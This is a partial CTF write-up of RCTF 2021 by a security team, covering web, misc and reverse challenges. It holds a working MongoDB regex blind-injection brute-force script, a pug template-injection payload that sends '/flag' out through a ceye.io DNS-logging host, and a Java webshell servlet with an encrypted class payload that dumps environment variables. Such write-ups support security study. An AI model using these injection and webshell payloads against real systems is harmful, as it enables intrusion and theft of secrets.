RCTF-2021 Partial WriteUp

Timeline Sec
Published 2021-10-08 17:40:27

RCTF2021

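Every Misc challenge in this competition was solved by 魔法少女雪殇! There is still plenty of room for improvement in the other categories, especially PWN and cryptography. If one of these happens to be your area and you would like a team to fight alongside, why not give it a try! Reply "加入团队" ("join the team") to the official account to get the joining instructions. We look forward to fighting side by side with you!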

Web

★candyshop

Use MongoDB injection to recover the password of the rabbit account; only rabbit can use the order feature. Injection payload:

username=rabbit&password[$regex]=^3

Write a script:

import requests
import time

sess=requests.Session()
url='http://127.0.0.1:3000/user/login'
url='http://123.60.21.23:23333/user/login'

f='Login Failed!' # text the page contains on a wrong guess
y='You Bad Bad' # text the page contains on a correct guess

start=0 # start position in the string
strlen=80 # length of the string to brute-force

sleep_time=0

ostr=''

word_li=list(range(48,58))+list(range(97,123))

# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start,start+strlen):
    for i in word_li: # lowercase letters and digits
        time.sleep(sleep_time)

        payload="^({})".format(ostr+chr(i)) # injection payload
        # print(payload)
        # build the POST data
        data={
            'username':'rabbit',
            'password[$regex]':payload
        }
        sess.get(url)
        res=sess.post(url,data=data)
        res.encoding=res.apparent_encoding # handle Chinese encoding
        text=res.text
        if(f in text):
            # print(1)
            continue
        elif(y in text):
            ostr+=chr(i)
            print(ostr,j)
            break
        else: # unexpected response: neither the success nor the failure marker
            print('error:',text)
            print(payload)
            exit()
            break
print(ostr)
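
From the defending side, the login traffic produced by the script above is easy to recognise. The following is an added example, not part of the original write-up or the challenge code: it flags form parameters shaped like `password[$regex]`, spots a client sending anchored `$regex` guesses of increasing length, and shows the type check that stops the injection. All function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample login requests (client, raw form body); not captured traffic.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "username=alice&password=hunter2"),
    ("10.0.0.9", "username=rabbit&password[$regex]=^(3)"),
    ("10.0.0.9", "username=rabbit&password[$regex]=^(3a)"),
    ("10.0.0.9", "username=rabbit&password%5B%24regex%5D=%5E(3a7)"),
    ("10.0.0.7", "username=bob&password=p%24ssw0rd"),
]

# A bracketed sub-key starting with "$" is what a nested-form parser
# turns into {"$op": value}, i.e. a query operator instead of a string.
OPERATOR_KEY = re.compile(r"^(?P<field>[^\[\]]+)\[(?P<op>\$[A-Za-z]+)\]")

def operator_params(body):
    """Return [(field, operator, value)] for every operator-shaped parameter."""
    hits = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = OPERATOR_KEY.match(key)
        if m:
            hits.append((m.group("field"), m.group("op"), value))
    return hits

def regex_extraction_clients(requests, min_lengths=3):
    """Flag clients that send anchored $regex guesses of several different lengths,
    the footprint of character-by-character blind extraction."""
    lengths = {}
    for client, body in requests:
        for _field, op, value in operator_params(body):
            if op == "$regex" and value.startswith("^"):
                guess = value.lstrip("^").strip("()")
                lengths.setdefault(client, set()).add(len(guess))
    return sorted(c for c, seen in lengths.items() if len(seen) >= min_lengths)

def is_plain_credentials(parsed):
    """Server-side fix: both login fields must be plain strings, never objects."""
    return all(isinstance(parsed.get(k), str) for k in ("username", "password"))

if __name__ == "__main__":
    for client, body in SAMPLE_REQUESTS:
        print(client, operator_params(body))
    print("suspected extraction:", regex_extraction_clients(SAMPLE_REQUESTS))
```
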

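Log in to the rabbit account with the recovered password; the order feature has a pug template injection:

Note that pug templates impose certain formatting restrictions. After some adjustment the command executes successfully, but its output is not echoed back.

Finally, the flag is obtained through ceye's DNS log:
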
username=' readonly) %0a                        %23{console.log(global.process.mainModule.constructor._load("child_process").execSync("ping `cat /flag`.xxx.ceye.io").toString())} // &candyname=bunny_candy&address=1

Misc

★welcome_to_rctf

Just go to ROIS.

http://www.snowywar.top/wp-content/themes/zibll/go.php?url=aHR0cHM6Ly9yb2lzLmlvLw==

★CheckIn

A little weird: when you post an issue, the Actions workflow runs.

You can see your issue there, and the flag is always shown as ***.

This means that when I enter the correct five-digit number, it will be replaced with ***, so I just need to look through someone else's Actions runs.

I found it.

The flag is 52079, solved!

★coolcat

Open the link and I saw: visit /getImage.

Wow, cool pic.

In /upload, I uploaded a picture and got a weird picture back.

So let’s take a look at the code

from PIL import Image

def ACM(img, p, q, m):
    counter = 0
    if img.mode == "P":
        img = img.convert("RGB")
    assert img.size[0] == img.size[1]
    while counter < m:
        dim = width, height = img.size
        with Image.new(img.mode, dim) as canvas:
            for x in range(width):
                for y in range(height):
                    nx = (x + y * p) % width
                    ny = (x * q + y * (p * q + 1)) % height
                    canvas.putpixel((nx, ny), img.getpixel((x, y)))
        img = canvas
        counter += 1
    return canvas
# My image was encrypted by ACM ,  but I lost the p ,q  and m ......

I don't know p, q or m, but I can confirm that m is random.

So I made a special picture to verify my idea. The /getImage picture is 600×600, so mine is too.

from PIL import Image
# all-black 600x600 image with a single white probe pixel at (0,1)
with Image.new('RGB',(600,600),(0,0,0)) as pic:
    pic.putpixel((0,1),(255,255,255))
    pic.save('C:/Users/Snowywar/Desktop/e99aa4e9b7fc4ed5a74a590a63b131e6/1.jpg')
    pic.show()

I got this picture.

After uploading it, I got a variety of different results. Since m is random, there must be a case where m=1, and then the values of p and q can be calculated directly. I also ran a test: the larger m (the number of rounds) is, the farther the resulting point ends up from the original point.

After many tests, I got the closest point

Using Photoshop, I got this coordinate: (66,66)

But I still need /getImage when m=1, and continue to test many times.

Finally, I got this one.

Using my Python script, I can get the flag.

from PIL import Image

img = Image.open('./tes1.jpg')
if img.mode == "P":
    img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
# p and q taken from the (66,66) coordinate found above
p = 66
q = 66

with Image.new(img.mode, dim) as canvas:
    for nx in range(width):
        for ny in range(height):
            # invert one ACM round: recover y first, then x
            y = (ny - nx * q) % height
            x = (nx - y * p) % width
            canvas.putpixel((x, y), img.getpixel((nx, ny)))
canvas.show()
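
The inverse used above can be checked without the challenge server. The following is an added example, not the author's script: it re-implements the ACM round and its inverse on a plain list-of-lists grid (indexed `grid[x][y]`), and goes beyond the write-up by using two probe markers so that p and q can be read off and a single-round result can be told apart from a multi-round one. The grid sizes, marker names and helper names are assumptions made for the illustration.

```python
def acm_round(grid, p, q):
    """Forward round: (x, y) -> (x + y*p, x*q + y*(p*q + 1)) mod n."""
    n = len(grid)
    out = [[None] * n for _ in range(n)]
    for x in range(n):
        for y in range(n):
            out[(x + y * p) % n][(x * q + y * (p * q + 1)) % n] = grid[x][y]
    return out

def acm_inverse_round(grid, p, q):
    """Inverse round: y = ny - nx*q, then x = nx - y*p (mod n)."""
    n = len(grid)
    out = [[None] * n for _ in range(n)]
    for nx in range(n):
        for ny in range(n):
            y = (ny - nx * q) % n
            x = (nx - y * p) % n
            out[x][y] = grid[nx][ny]
    return out

def repeat(step, grid, p, q, m):
    """Apply a forward or inverse round m times."""
    for _ in range(m):
        grid = step(grid, p, q)
    return grid

def probe_grid(n):
    """Constructed probe image: marker 'A' at (0, 1), marker 'B' at (1, 0)."""
    grid = [[0] * n for _ in range(n)]
    grid[0][1], grid[1][0] = "A", "B"
    return grid

def locate(grid, marker):
    """Return the (x, y) position of a marker value."""
    return next((x, y) for x, col in enumerate(grid)
                for y, v in enumerate(col) if v == marker)

def recover_pq(scrambled):
    """Return (p, q) mod n if the probe is consistent with a single round, else None.
    After one round 'A' sits at (p, p*q + 1) and 'B' at (1, q)."""
    n = len(scrambled)
    (ax, ay), (bx, by) = locate(scrambled, "A"), locate(scrambled, "B")
    p, q = ax, by
    if bx == 1 and (p * q + 1) % n == ay:
        return p, q
    return None

if __name__ == "__main__":
    print(recover_pq(acm_round(probe_grid(11), 3, 5)))
    print(recover_pq(repeat(acm_round, probe_grid(11), 3, 5, 2)))
```
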

Isn't it a rabbit?

★Monopoly

A game: you need 10 million to win.

The game of luck does not even require reverse analysis of the program.

When you choose hard mode, it will let you enter a seed, which determines your next steps and behavior.

While playing again, I found that pressing 4 returns to the difficulty selection, and pressing 3 then goes back into the difficulty mode. It lets you enter a new seed, but the amount of money remains the same. Maybe this is a bug.

At the same time, the number of steps in the first step of different seeds is also fixed, indicating that it is pseudo-random.

This is my seed and test.

I found that when the seed is 22, the amount of money is doubled, so I wrote a looping script to get the flag.

from pwn import *
import re
import time
p=remote("123.60.25.24",20031)
context.log_level="debug"
p.recvuntil('your name?\n')
p.sendline('haha')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
for i in range(999999):
    #money = p.recvline('your money')

    #if p.recvuntil('RCTF'):
     #   print(p.recvuntil('RCTF'))
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')

★ezshell

Is this really misc? I don't think so.

Download the war package

protected void service(HttpServletRequest request, HttpServletResponse response) {
        try {
            String k;
            if (request.getMethod().equals("POST")) {
                response.getWriter().write("post");
                k = "e45e329feb5d925b";
                HttpSession session = request.getSession(); //Generate session, the next line is also
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
                byte[] evilClassBytes = (new BASE64Decoder()).decodeBuffer(request.getReader().readLine()); //Read the content of the post request package
                // Override the class loader so that it can load any malicious class
                class U extends ClassLoader {
                    U(ClassLoader c) {
                        super(c);
                    }
                    public Class g(byte[] b) {
                        return super.defineClass(b, 0, b.length);
                    }
                }
                Class evilClass = (new U(this.getClass().getClassLoader())).g(c.doFinal(evilClassBytes)); //Decrypt the post data packet basedecode and then AES
                Object a = evilClass.newInstance();
                Method b = evilClass.getMethod("e", Object.class, Object.class); 
                b.invoke(a, request, response); 
            } else {
                //download war
            }
        } catch (Exception var10) {
        }
}

So, write a malicious class and let the servlet call it.

payload.java

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.util.*;

public class payload{
    public void e(Object req, Object res) throws IOException, InterruptedException {

        HttpServletRequest req1 = (HttpServletRequest)req;
        HttpServletResponse res1 = (HttpServletResponse)res;
        StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
        Map<String, String> env = System.getenv();
        Iterator var7 = env.keySet().iterator();

        while(var7.hasNext()) {
            String name = (String)var7.next();
            basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
        }

        basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
        Properties props = System.getProperties();
        Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
        Iterator var9 = entrySet.iterator();

        while(var9.hasNext()) {
            Map.Entry<Object, Object> entry = (Map.Entry)var9.next();
            basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
        }

        String currentPath = (new File("")).getAbsolutePath();
        String driveList = "";
        File[] roots = File.listRoots();
        File[] var14 = roots;
        int var13 = roots.length;

        for(int var12 = 0; var12 < var13; ++var12) {
            File f = var14[var12];
            driveList = driveList + f.getPath() + ";";
        }

        String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
        Map<String, String> entity = new HashMap();
        res1.getWriter().write(basicInfo.toString()+"<br>");
        res1.getWriter().write(currentPath+"<br>");
        res1.getWriter().write(driveList+"<br>");
        res1.getWriter().write(osInfo+"<br>");
    }
}

But it did not work. I saw the hint.

I know.

Unpack BehinderV2.0 and locate the equals function

public boolean equals(Object obj) {
        PageContext page = (PageContext)obj;
        page.getResponse().setCharacterEncoding("UTF-8");
        String result = "";

        try {
            StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
            Map<String, String> env = System.getenv();
            Iterator var7 = env.keySet().iterator();

            while(var7.hasNext()) {
                String name = (String)var7.next();
                basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
            }

            basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
            Properties props = System.getProperties();
            Set<Entry<Object, Object>> entrySet = props.entrySet();
            Iterator var9 = entrySet.iterator();

            while(var9.hasNext()) {
                Entry<Object, Object> entry = (Entry)var9.next();
                basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
            }

            String currentPath = (new File("")).getAbsolutePath();
            String driveList = "";
            File[] roots = File.listRoots();
            File[] var14 = roots;
            int var13 = roots.length;

            for(int var12 = 0; var12 < var13; ++var12) {
                File f = var14[var12];
                driveList = driveList + f.getPath() + ";";
            }

            String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
            Map<String, String> entity = new HashMap();
            entity.put("basicInfo", basicInfo.toString());
            entity.put("currentPath", currentPath);
            entity.put("driveList", driveList);
            entity.put("osInfo", osInfo);
            result = this.buildJson(entity, true);
            String key = page.getSession().getAttribute("u").toString();
            ServletOutputStream so = page.getResponse().getOutputStream();
            so.write(Encrypt(result.getBytes(), key));
            so.flush();
            so.close();
            page.getOut().clear();
        } catch (Exception var15) {
            var15.printStackTrace();
        }

        return true;
    }

Isn’t this just outputting environment variables?

Generate base64 payload data

exp

import com.sun.xml.internal.messaging.saaj.util.Base64;
import org.junit.jupiter.api.Test;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Enumeration;

public class test1 extends HttpServlet {
    @Test
    public void test() throws IOException, NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException {
        String k = "e45e329feb5d925b";
        Cipher c = Cipher.getInstance("AES");
        c.init(1, new SecretKeySpec(k.getBytes(), "AES"));
        FileInputStream fileInputStream = new FileInputStream(new File("payload.class"));
        int n = 0 ;
        // I don't know how to determine the length automatically, so I measured it manually
        byte[] buffer = new byte[3525];
        n = fileInputStream.read(buffer);
        System.out.println(n);
        System.out.println(Arrays.toString(buffer));
        byte[] bytes = c.doFinal(buffer);
        System.out.println(Arrays.toString(bytes));
        String s = (new BASE64Encoder()).encodeBuffer(bytes);
        System.out.println(s);
    }
}

Note that the bytes length must be accurate

POST

POST /shell HTTP/1.1
Host: 124.70.137.88:60080
Content-Length: 4716
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.70.137.88:60080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.70.137.88:60080/shell
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-CN;q=0.7,zh;q=0.6
Cookie: JSESSIONID=EDF504EDA8DBEE209AEC526FCAADD8DC
Connection: close

back
...<br><br/><br>TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc  https://www-us.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc  https://www.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc     https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc<br><br/><br>ffl4444gg=RCTF{e2zzzz5h333ll_sooo_ez}<br><br/><br>JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre<br><br/><br>...

Reverse

★Hi!Harmony!

Open it in Ghidra.

Search the strings to find this section.

Decryption script

num1 = [0x48,0x41,0x52,0x4d,
0x4f,0x4e,0x59,0x44,
0x52,0x45,0x41,0x4d,
0x49,0x54,0x50,0x4f,
0x53,0x53,0x49,0x42,
0x4c,0x45
]


num2=[0x0,0x41,0x42,0x43,0x44,
0x45,0x46,0x47,0x48,
0x49,0x4a,0x4b,0x4c,
0x4d,0x4e,0x4f,0x50,
0x51,0x52,0x53,0x54,
0x55,0x56,0x57,0x58,
0x59,0x5a
]


for i in range(22):
    if num1[i] + 3 < 0x5b:
        num1[i] = num1[i] +3
    else:
        num1[i] = num2[(num1[i] - 0x57)%0x1a]


for x in num1:
    print(chr(x),end="")

KDUPRQBGUHDPLWSRVVLEOH

Welcome, all of you who truly love technology!

Timeline Sec team

On the road of security, we walk side by side with you

This article is part of the Tencent Cloud self-media sharing program and is shared from the Timeline Sec WeChat official account.
Originally published: 2021-09-15
